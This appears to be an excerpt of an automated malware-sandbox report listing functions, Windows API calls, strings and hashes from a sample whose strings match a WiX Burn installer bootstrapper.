crypt32.dll, xrefs: 009910CA
msi.dll, xrefs: 009910A0
cabinet.dll, xrefs: 00991099, 00991114
wininet.dll, xrefs: 009910AE
comres.dll, xrefs: 009910B5
version.dll, xrefs: 009910A7
clbcatq.dll, xrefs: 009910BC

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
API String ID: 3687706282-3151496603
Opcode ID: dc92a13f7678cb58e8c6ff0b4147a72d321065fb14ca616d94dbef5b1c4de2e7
Instruction ID: 968438dd0472b6983d11245708c9c9dd848cb8c3b8292f11af287cbb7a14b264
Opcode Fuzzy Hash: dc92a13f7678cb58e8c6ff0b4147a72d321065fb14ca616d94dbef5b1c4de2e7
Instruction Fuzzy Hash: 33217C7194021DABDF20DFA8DC45BEEBBB8BB49710F51811AFA10B6291D77099048BA4

Function 009AA0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

Failed create working folder., xrefs: 009AA0EE
Failed to copy working folder., xrefs: 009AA116
Failed to calculate working folder to ensure it exists., xrefs: 009AA0D8

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CurrentDirectoryErrorLastProcessWindows
String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
API String ID: 3841436932-2072961686
Opcode ID: d4d12976fd6a766e34e8838dc11c4f617d0938cc14bddbbb490c1cec4468411a
Instruction ID: 494dc09ae918d860e6ec22ffb621ba58373e3f250832d44d8e42f8a65df3f469
Opcode Fuzzy Hash: d4d12976fd6a766e34e8838dc11c4f617d0938cc14bddbbb490c1cec4468411a
Instruction Fuzzy Hash: 3B01F732909568FB8F335B95DC06DAEBB79DFD6B60B114266F810BA310DB319E00E6D1

Function 009C48D8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,009C48AE,00000000,009F7F08,0000000C,009C4A05,00000000,00000002,00000000), ref: 009C48F9
TerminateProcess.KERNEL32(00000000,?,009C48AE,00000000,009F7F08,0000000C,009C4A05,00000000,00000002,00000000), ref: 009C4900
ExitProcess.KERNEL32 ref: 009C4912

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 53ded00ead7f65cfbf1068dca5bcb9690e587a3a7ce8e1fdd71c7054b23e9be7
Instruction ID: 9dd21f751919e79b8213c4ca18702fe8b8e2c4f9621a2902036c0b0ad96c1610
Opcode Fuzzy Hash: 53ded00ead7f65cfbf1068dca5bcb9690e587a3a7ce8e1fdd71c7054b23e9be7
Instruction Fuzzy Hash: 28E04631916218EBCF11AF50CE18F4A3B29EF84B81B014019F8198A132CB35DC82EA81

Function 0099394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 9ac9147c38feab36fd40c7fea845829a1d695933f680a9c51066b5990b512bb7
Instruction ID: 456cb796c54960c0648f2f6d93d600786dedcd06e904f2265c30e77944b37e08
Opcode Fuzzy Hash: 9ac9147c38feab36fd40c7fea845829a1d695933f680a9c51066b5990b512bb7
Instruction Fuzzy Hash: 6CC012321EC20DE7CB005FF4DC0DC5637ACB7246027048405B505C2110C738E0509760

Function 0099DF33 Relevance: 126.6, APIs: 11, Strings: 61, Instructions: 646COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 0099E058
SysFreeString.OLEAUT32(00000000), ref: 0099E736

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

Strings

Failed to get @RollbackBoundaryForward., xrefs: 0099E510
MsuPackage, xrefs: 0099E406
Cache, xrefs: 0099E14B
MspPackage, xrefs: 0099E3CD
Failed to get @Size., xrefs: 0099E6D4
Failed to get @PerMachine., xrefs: 0099E6C6
Permanent, xrefs: 0099E235
feclient.dll, xrefs: 0099E298
InstallCondition, xrefs: 0099E2BC
msi.dll, xrefs: 0099E1C8
PerMachine, xrefs: 0099E21A
Failed to get @Cache., xrefs: 0099E6FA
Size, xrefs: 0099E1E4
Failed to get @Vital., xrefs: 0099E6B8
yes, xrefs: 0099E187
RollbackBoundary, xrefs: 0099DF56
Failed to get @RollbackLogPathVariable., xrefs: 0099E4EF
RollbackLogPathVariable, xrefs: 0099E299
cabinet.dll, xrefs: 0099E1FE
Failed to get @Id., xrefs: 0099E701
package.cpp, xrefs: 0099DFBE, 0099E0E3, 0099E4CF, 0099E564
Failed to allocate memory for rollback boundary structs., xrefs: 0099DFCA
MsiPackage, xrefs: 0099E395
Failed to parse dependency providers., xrefs: 0099E6AA
Failed to select rollback boundary nodes., xrefs: 0099DF69
Failed to parse payload references., xrefs: 0099E6B1
Failed to allocate memory for MSP patch sequence information., xrefs: 0099E4DB
RollbackBoundaryForward, xrefs: 0099E2DF
clbcatq.dll, xrefs: 0099E219
Failed to get package node count., xrefs: 0099E0B1
Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage, xrefs: 0099E081
always, xrefs: 0099E1A7
Failed to allocate memory for patch sequence information to package lookup., xrefs: 0099E570
wininet.dll, xrefs: 0099E25A
Failed to parse target product codes., xrefs: 0099E69B
CacheId, xrefs: 0099E1C9
Failed to parse MSP package., xrefs: 0099E531
Failed to get @RollbackBoundaryBackward., xrefs: 0099E527
crypt32.dll, xrefs: 0099E2BB
Failed to get next node., xrefs: 0099E708
comres.dll, xrefs: 0099E234
Vital, xrefs: 0099E027, 0099E25B
Failed to parse MSU package., xrefs: 0099E53B
InstallSize, xrefs: 0099E1FF
Failed to get @CacheId., xrefs: 0099E6DB
Failed to get @InstallCondition., xrefs: 0099E4F9
RollbackBoundaryBackward, xrefs: 0099E319
Failed to parse MSI package., xrefs: 0099E3C1
Failed to select package nodes., xrefs: 0099E094
Failed to find backward transaction boundary: %ls, xrefs: 0099E51D
Failed to get rollback bundary node count., xrefs: 0099DF8E
Failed to get @InstallSize., xrefs: 0099E6CD
Failed to find forward transaction boundary: %ls, xrefs: 0099E506
Failed to get @Permanent., xrefs: 0099E6BF
ExePackage, xrefs: 0099E357
Failed to allocate memory for package structs., xrefs: 0099E0EF
Invalid cache type: %ls, xrefs: 0099E6EA
Failed to parse EXE package., xrefs: 0099E389
`5w, xrefs: 0099E058, 0099E47B, 0099E736
Failed to get @LogPathVariable., xrefs: 0099E4E5
LogPathVariable, xrefs: 0099E276

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`5w$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
API String ID: 336948655-885345141
Opcode ID: 52a4cf3a7e901dbc7c42c0f43e518ebd4e1f1c8ccc128f1a229d14f87831dd2d
Instruction ID: d99379d851b2aec1ab2e119de313c6c253d358b0d08994701d175e8e3073ecfc
Opcode Fuzzy Hash: 52a4cf3a7e901dbc7c42c0f43e518ebd4e1f1c8ccc128f1a229d14f87831dd2d
Instruction Fuzzy Hash: EA32C031D4422AEBCF12DF99CC42BAEB7B4AF84724F114665F914BB290D7B4ED409B90

Function 0099F9E3 Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 446
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Registration, xrefs: 0099F9FD
Failed to get @HelpLink., xrefs: 0099FC04
AboutUrl, xrefs: 0099FC37
Failed to select registration node., xrefs: 0099FA1C
Failed to get @PerMachine., xrefs: 0099FB25
ExecutableName, xrefs: 0099FAF4
Failed to get @Version., xrefs: 0099FAA4
Invalid modify disabled type: %ls, xrefs: 0099FD94
PerMachine, xrefs: 0099FB12
Publisher, xrefs: 0099FBC8
Failed to get @Name., xrefs: 0099FED4
Failed to select Update node., xrefs: 0099FE3C
yes, xrefs: 0099FD36
registration.cpp, xrefs: 0099FD87
Version, xrefs: 0099FA91
Tag, xrefs: 0099FA57
Failed to get @DisplayName., xrefs: 0099FB95
Failed to get @Id., xrefs: 0099FA49
DisplayVersion, xrefs: 0099FBA3
Failed to parse @Version: %ls, xrefs: 0099FAC5
Failed to get @Department., xrefs: 0099FE8E
Failed to parse software tag., xrefs: 0099FE10
Failed to get @ProductFamily., xrefs: 0099FEB3
Failed to get @DisplayVersion., xrefs: 0099FBBA
Failed to get @UpdateUrl., xrefs: 0099FC73
Failed to get @ParentDisplayName., xrefs: 0099FC98
Failed to get @DisableModify., xrefs: 0099FDB8
HelpLink, xrefs: 0099FBED
Failed to get @Contact., xrefs: 0099FCE8
Failed to get @Publisher., xrefs: 0099FBDF
Failed to parse related bundles, xrefs: 0099FA83
Manufacturer, xrefs: 0099FE53
ProviderKey, xrefs: 0099FAD3
Contact, xrefs: 0099FCD1
Failed to get @ProviderKey., xrefs: 0099FAE6
Failed to get @AboutUrl., xrefs: 0099FC4E
DisableModify, xrefs: 0099FCF6
Failed to get @Classification., xrefs: 0099FEF5
Failed to set registration paths., xrefs: 0099FF08
HelpTelephone, xrefs: 0099FC12
Failed to get @HelpTelephone., xrefs: 0099FC29
Failed to get @DisableRemove., xrefs: 0099FDE0
Failed to get @Manufacturer., xrefs: 0099FE66
Failed to get @ExecutableName., xrefs: 0099FB07
Failed to select ARP node., xrefs: 0099FB4F
Update, xrefs: 0099FE1E
ProductFamily, xrefs: 0099FE9C
Failed to get @Register., xrefs: 0099FB70
UpdateUrl, xrefs: 0099FC5C
Name, xrefs: 0099FEC1
Department, xrefs: 0099FE77
Failed to get @Tag., xrefs: 0099FA6A
DisplayName, xrefs: 0099FB7E
Classification, xrefs: 0099FEE2
ParentDisplayName, xrefs: 0099FC81
DisableRemove, xrefs: 0099FDC9
Comments, xrefs: 0099FCA9
Arp, xrefs: 0099FB33
button, xrefs: 0099FD15
Register, xrefs: 0099FB5D
Failed to get @Comments., xrefs: 0099FCC0

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
API String ID: 760788290-2956246334
Opcode ID: af2b29b5713b60868a697732cc705260a05a4bffe68aac0375faa8ec61a59475
Instruction ID: deddea59f48f04f15edb4a96edf6b48d4733021450598da7aa7203f3f126d3f5
Opcode Fuzzy Hash: af2b29b5713b60868a697732cc705260a05a4bffe68aac0375faa8ec61a59475
Instruction Fuzzy Hash: AFE12A32E842A9BBCF1296A9CC52FBDF6686B41714F154272FE11F7290D7719E4093C0

Function 0099B48B Relevance: 91.6, APIs: 24, Strings: 28, Instructions: 578
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00000000,7744C3F0,00000000), ref: 0099B502
SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B550
GetLastError.KERNEL32(?,?,?,00000000,7744C3F0,00000000), ref: 0099B556
ReadFile.KERNELBASE(00000000,00994461,00000040,?,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B59E
GetLastError.KERNEL32(?,?,?,00000000,7744C3F0,00000000), ref: 0099B5A4
SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B601
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B607
ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B650
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B656
SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B6C7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B6CD
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B716
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B71C
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B765
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B76B
SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B7B7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B7BD

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B810
ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B872
SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B8FC
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 0099B906

Strings

Failed to find Burn section., xrefs: 0099BB32
PE Header from file didn't match PE Header in memory., xrefs: 0099BB11
Failed to read signature offset., xrefs: 0099B747
Failed to read signature size., xrefs: 0099B796
.wix, xrefs: 0099B830
section.cpp, xrefs: 0099B523, 0099B577, 0099B5C5, 0099B628, 0099B677, 0099B6EE, 0099B73D, 0099B78C, 0099B7E1, 0099B898, 0099B8D8, 0099B92A, 0099B98F, 0099B9B9, 0099B9E0, 0099BAC7, 0099BB07, 0099BB26, 0099BB63, 0099BBA1, 0099BBC4, 0099BBDF
Failed to allocate memory for container sizes., xrefs: 0099BAD3
Failed to seek to start of file., xrefs: 0099B581
Failed to seek past optional headers., xrefs: 0099B7EB
Failed to read section info, data to short: %u, xrefs: 0099B8AA
Failed to read section info, unsupported version: %08x, xrefs: 0099B9F5
burn, xrefs: 0099B838
Failed to seek to section info., xrefs: 0099B6F8, 0099B934
Failed to find valid NT image header in buffer., xrefs: 0099BBD0
Failed to open handle to engine process path., xrefs: 0099B52D
Failed to read DOS header., xrefs: 0099B5CF
Failed to read NT header., xrefs: 0099B681
Failed to read complete image section header, index: %u, xrefs: 0099BB75
(, xrefs: 0099B81D
Failed to read section info., xrefs: 0099B999
PE, xrefs: 0099B698
4, xrefs: 0099B884
Failed to get total size of bundle., xrefs: 0099BA23
Failed to allocate buffer for section info., xrefs: 0099B8E4
Failed to find valid DOS image header in buffer., xrefs: 0099BBEB
Failed to read image section header, index: %u, xrefs: 0099BBAC
Failed to seek to NT header., xrefs: 0099B632
Failed to read complete section info., xrefs: 0099B9C5

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
API String ID: 3411815225-695169583
Opcode ID: 917f098df7a0fdc3155d9c1b5a9d068e785b3568c129e193b8e22d63c3c9be25
Instruction ID: 58b5833bbf7b173cb624a45c6f2d3472e6f78e1086106414ef1ea161e56e2bad
Opcode Fuzzy Hash: 917f098df7a0fdc3155d9c1b5a9d068e785b3568c129e193b8e22d63c3c9be25
Instruction Fuzzy Hash: 08120B72981235EBDF309B59DE45FAA7768AF84750F018196FE04BB280D7789D40DBE0

Function 009B0D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32(?,?,?,?,?,009B08BC,?,?), ref: 009B0D25
GetLastError.KERNEL32(?,?,?,?,009B08BC,?,?), ref: 009B0D2F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,009B08BC,?,?), ref: 009B0D74
GetLastError.KERNEL32(?,?,?,?,009B08BC,?,?), ref: 009B0D7F
ResetEvent.KERNEL32(?,?,?,?,?,009B08BC,?,?), ref: 009B0DB7
GetLastError.KERNEL32(?,?,?,?,009B08BC,?,?), ref: 009B0DC1

Strings

Failed to create file: %ls, xrefs: 009B1001
Invalid operation for this state., xrefs: 009B0E1D
cabextract.cpp, xrefs: 009B0D53, 009B0DA3, 009B0DE5, 009B0E11, 009B0E94, 009B0EDC, 009B0F21, 009B0F89, 009B0FF4, 009B1045, 009B108A, 009B10CE
Failed to allocate buffer for stream., xrefs: 009B0F93
Failed to reset begin operation event., xrefs: 009B0DEF, 009B0F2B
Failed to set operation complete event., xrefs: 009B0D5D, 009B0E9E
Failed to set end of file., xrefs: 009B1094
Failed to wait for begin operation event., xrefs: 009B0DAD, 009B0EE6
Failed to set file pointer to end of file., xrefs: 009B104F
Failed to set file pointer to beginning of file., xrefs: 009B10D8
Failed to copy stream name: %ls, xrefs: 009B0E50

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$Event$ObjectResetSingleWait
String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 1865021742-2104912459
Opcode ID: c59c2593f77da2cbfb9a4c4ded9b14e675428cbbbea337ee43aec9c852268479
Instruction ID: 8fde39c00712a6df7606adc592d7e6435afd00e6416e516f076a9a9668673b0f
Opcode Fuzzy Hash: c59c2593f77da2cbfb9a4c4ded9b14e675428cbbbea337ee43aec9c852268479
Instruction Fuzzy Hash: 84913937AC5672B7D73116AA4F09BAB2A54BF84B70F224615BF20BF2D0D754EC4092D1

Function 00994D39 Relevance: 38.7, APIs: 6, Strings: 16, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009933C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,009910DD,?,00000000), ref: 009933E8

CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00994F40
CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00994F4F
CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00994F5E
CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00994F69

Strings

D, xrefs: 00994EA9
Failed to allocate full command-line., xrefs: 00994E8E
Failed to launch clean room process: %ls, xrefs: 00994EF7
Failed to append original command line., xrefs: 00994E69
Failed to get path for current process., xrefs: 00994D83
Failed to cache to clean room., xrefs: 00994DC2
Failed to wait for clean room process: %ls, xrefs: 00994F23
%ls %ls, xrefs: 00994E55
engine.cpp, xrefs: 00994EEA
"%ls" %ls, xrefs: 00994E7A
burn.filehandle.self, xrefs: 00994E45
burn.filehandle.attached, xrefs: 00994E17
burn.clean.room, xrefs: 00994DDE
Failed to append %ls, xrefs: 00994E1C
Failed to allocate parameters for unelevated process., xrefs: 00994DFA
-%ls="%ls", xrefs: 00994DE6

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandle$FileModuleName
String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$engine.cpp
API String ID: 3884789274-2391192076
Opcode ID: 5cf6706f0b402e50bd8f15361456acca4a2c3a0929911790b1c1718111961ae7
Instruction ID: e5f243de09660619ac82eadac22c6cf0c3e7cfe80ce5864263e435b64df2a40e
Opcode Fuzzy Hash: 5cf6706f0b402e50bd8f15361456acca4a2c3a0929911790b1c1718111961ae7
Instruction Fuzzy Hash: 68718732D4122EEBCF229BE8CC45EEE7B78AF44720F114156F914B7291D7759A428BE0

